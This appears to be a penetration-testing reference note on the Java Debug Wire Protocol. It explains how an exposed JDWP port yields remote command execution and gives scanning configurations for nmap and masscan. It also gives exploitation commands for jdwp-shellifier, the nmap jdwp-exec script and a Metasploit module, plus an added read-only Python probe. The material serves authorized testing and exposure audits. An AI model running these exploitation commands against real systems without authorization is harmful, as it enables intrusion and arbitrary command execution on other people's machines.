8000 - JDWP

Overview

The Java Debug Wire Protocol (JDWP) is one of the three interfaces of the Java Platform Debugger Architecture (JPDA), which is designed for debugging in development environments. JDWP is the communication protocol used for the exchanges between a debugger and the Java Virtual Machine (JVM) being debugged, sometimes referred to as the "target JVM".

The JDWP protocol is asynchronous and implements two basic packet types: command packets and reply packets. Command packets instruct the receiving component to execute a specific command. While command packets can be sent by both the debugger and the target JVM, they are generally sent by the debugger. Reply packets are only sent in response to a command packet and return information about the command's execution (execution status, command output, etc.).

Remote code execution can be achieved through JDWP, as the protocol supports the loading of arbitrary classes into the target JVM and the invocation of methods. The code is executed on the remote system under the security context of the target JVM.

One example of a simplified process to remotely execute system commands is as follows:

  • Setting a breakpoint on a method that is frequently called at runtime, such as java.net.ServerSocket.accept() or java.lang.String.indexOf(). This step is required because the following instructions must run in the context of a live thread, and are therefore executed only once the breakpoint is hit.

  • Retrieving the JVM's runtime context (in the thread where the breakpoint was hit) by sending a ClassType/InvokeMethod packet that invokes the java.lang.Runtime.getRuntime() static method.

  • Allocating a Java String object holding the operating system command to execute.

  • Calling the Runtime.exec() method to execute the command held in the previously allocated string.

Another possibility is to inject a Java class, as a byte array, into the target JVM using secureClassLoader.defineClass. Once the class is loaded, one of its methods can be invoked to execute shell commands.

As JDWP is intended for non-production environments, the protocol supports neither authentication nor encryption of the exchanged data.

Remote debugging is disabled by default: a JVM must be explicitly started with the following arguments in order to be remotely debuggable (and thus to expose a JDWP interface):

  • Before Java 5.0: -Xdebug and -Xrunjdwp.

  • From Java 5.0 onward: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=<*:8000 | *:PORT>

Network scan

While JDWP services are commonly exposed on TCP port 8000, the port number is specified when the JVM is started, so JDWP services may be listening on any TCP port.

Note that JDWP communications start with a two-way handshake: the debugger sends the JDWP-Handshake string and the target JVM replies with the same string. This handshake allows JDWP services to be reliably identified.
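The handshake and the command/reply packet layout described above, as an added example in Python (not code from these notes or from any of the tools they cite): a small JDWP packet codec and a read-only probe() that only asks a JVM for its version (VirtualMachine/Version), which is enough to inventory debug listeners on hosts you administer. The field layout follows the JDWP specification; host and port are whatever you pass in.

```python
# Added example (not from the InfoSec Notes page or any JDWP tool): a minimal JDWP packet codec
# plus a read-only exposure check. Wire format per the JDWP spec: 14-byte "JDWP-Handshake",
# then packets with an 11-byte big-endian header (length, id, flags, cmdset+cmd or error code).
import socket
import struct

HANDSHAKE = b"JDWP-Handshake"
REPLY_FLAG = 0x80
CMDSET_VM, CMD_VERSION = 1, 1  # VirtualMachine command set / Version command (read-only)

def build_command(packet_id, cmdset, cmd, data=b""):  # flags byte is 0 for commands
    return struct.pack(">IIBBB", 11 + len(data), packet_id, 0, cmdset, cmd) + data

def build_reply(packet_id, error, data=b""):  # flags=0x80; 2-byte error code replaces cmdset/cmd
    return struct.pack(">IIBH", 11 + len(data), packet_id, REPLY_FLAG, error) + data

def parse_packet(raw):
    """Decode one packet; the flags byte tells command and reply packets apart."""
    length, packet_id, flags = struct.unpack_from(">IIB", raw)
    if length < 11 or len(raw) < length:
        raise ValueError("truncated or malformed JDWP packet")
    pkt = {"id": packet_id, "reply": bool(flags & REPLY_FLAG), "data": raw[11:length]}
    if pkt["reply"]:
        (pkt["error"],) = struct.unpack_from(">H", raw, 9)
    else:
        pkt["cmdset"], pkt["cmd"] = raw[9], raw[10]
    return pkt

def jdwp_string(data, offset=0):  # JDWP string = 4-byte length + UTF-8; returns (text, next offset)
    (n,) = struct.unpack_from(">I", data, offset)
    return data[offset + 4:offset + 4 + n].decode("utf-8"), offset + 4 + n

def parse_version_reply(data):  # body: description, jdwpMajor, jdwpMinor, vmVersion, vmName
    description, off = jdwp_string(data)
    major, minor = struct.unpack_from(">ii", data, off)
    vm_version, off = jdwp_string(data, off + 8)
    vm_name, _ = jdwp_string(data, off)
    return {"description": description, "jdwp": f"{major}.{minor}", "vm_version": vm_version, "vm_name": vm_name}

def probe(host, port, timeout=3.0):
    """Handshake with host:port; return the JVM's version info if it speaks JDWP, else None."""
    with socket.create_connection((host, port), timeout=timeout) as sock, sock.makefile("rb") as rx:
        sock.sendall(HANDSHAKE)
        if rx.read(len(HANDSHAKE)) != HANDSHAKE:
            return None  # something else is listening, or the JVM rejected the handshake
        sock.sendall(build_command(1, CMDSET_VM, CMD_VERSION))
        head = rx.read(11)
        raw = head + rx.read(struct.unpack(">I", head[:4])[0] - 11)
        return parse_version_reply(parse_packet(raw)["data"])
```

A listener that speaks another protocol and stays silent surfaces as a socket.timeout after `timeout` seconds; probe() issues only the handshake and the Version query, neither of which changes state in the target JVM.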

nmap -v <-p 8000 | -p-> -sV -sC -oA nmap_JDWP <RANGE | CIDR>

masscan with the configuration file below can be used to scan the network for accessible JDWP services, by scanning for open TCP ports and attempting a JDWP handshake on each of them.

# Usage: masscan [-v] -c <JDWP_MASSCAN_CONF>
# Adapted from: https://raw.githubusercontent.com/IOActive/jdwp-shellifier/master/jdwp-masscan.cfg

rate =  <5000.00 | RATE>
randomize-hosts = true
banners = true
rotate = 0
rotate-dir = .
rotate-offset = 0
rotate-filesize = 0

range = <IP | RANGE | CIDR>
ports = <3999,5000,5005,8000,8453,8787-8788,9001,18000 | 1-65535 | TCP_PORTS>

min-packet = 60
# base64 of the 14-byte handshake string "JDWP-Handshake" (case-sensitive in the reference implementation)
hello-string[0] = SkRXUC1IYW5kc2hha2U=

Remote Code Execution

The Metasploit exploit/multi/misc/java_jdwp_debugger module, the jdwp-shellifier Python script, and the nmap jdwp-exec NSE script can all be used to exploit a JDWP service in order to execute operating system commands remotely.

The nmap jdwp-exec NSE script remotely injects a Java class, while the Metasploit module and jdwp-shellifier.py directly retrieve the Runtime context to call the Runtime.exec() method.

Note that the Metasploit exploit/multi/misc/java_jdwp_debugger module drops a payload file to disk and may thereby trigger antivirus alerts. Neither the nmap jdwp-exec NSE script nor jdwp-shellifier.py uploads a file to the targeted system.

# If executed without a command, jdwp-shellifier retrieves basic system information (OS version, current user, Runtime ClassPath, etc.).
# Defaults to breaking on "java.net.ServerSocket.accept" calls.
# Setting the breakpoint on "java.lang.String.indexOf" can be more reliable.
jdwp-shellifier.py -t <IP | HOSTNAME> -p <PORT> [--break-on <'java.lang.String.indexOf' | JAVA_METHOD>]
jdwp-shellifier.py -t <IP | HOSTNAME> -p <PORT> [--break-on <'java.lang.String.indexOf' | JAVA_METHOD>] --cmd "<COMMAND>"

nmap -v -sT -sV -p <PORT> --script=+jdwp-exec --script-args cmd="<COMMAND>" <IP | HOSTNAME | RANGE | CIDR>

msf > use exploit/multi/misc/java_jdwp_debugger

References

https://docs.oracle.com/javase/7/docs/technotes/guides/jpda/jdwp-spec.html

https://ioactive.com/hacking-java-debug-wire-protocol-or-how/

https://book.hacktricks.xyz/pentesting/pentesting-jdwp-java-debug-wire-protocol

https://www.redteamsecure.com/research/exploitation-java-debug-wire-protocol
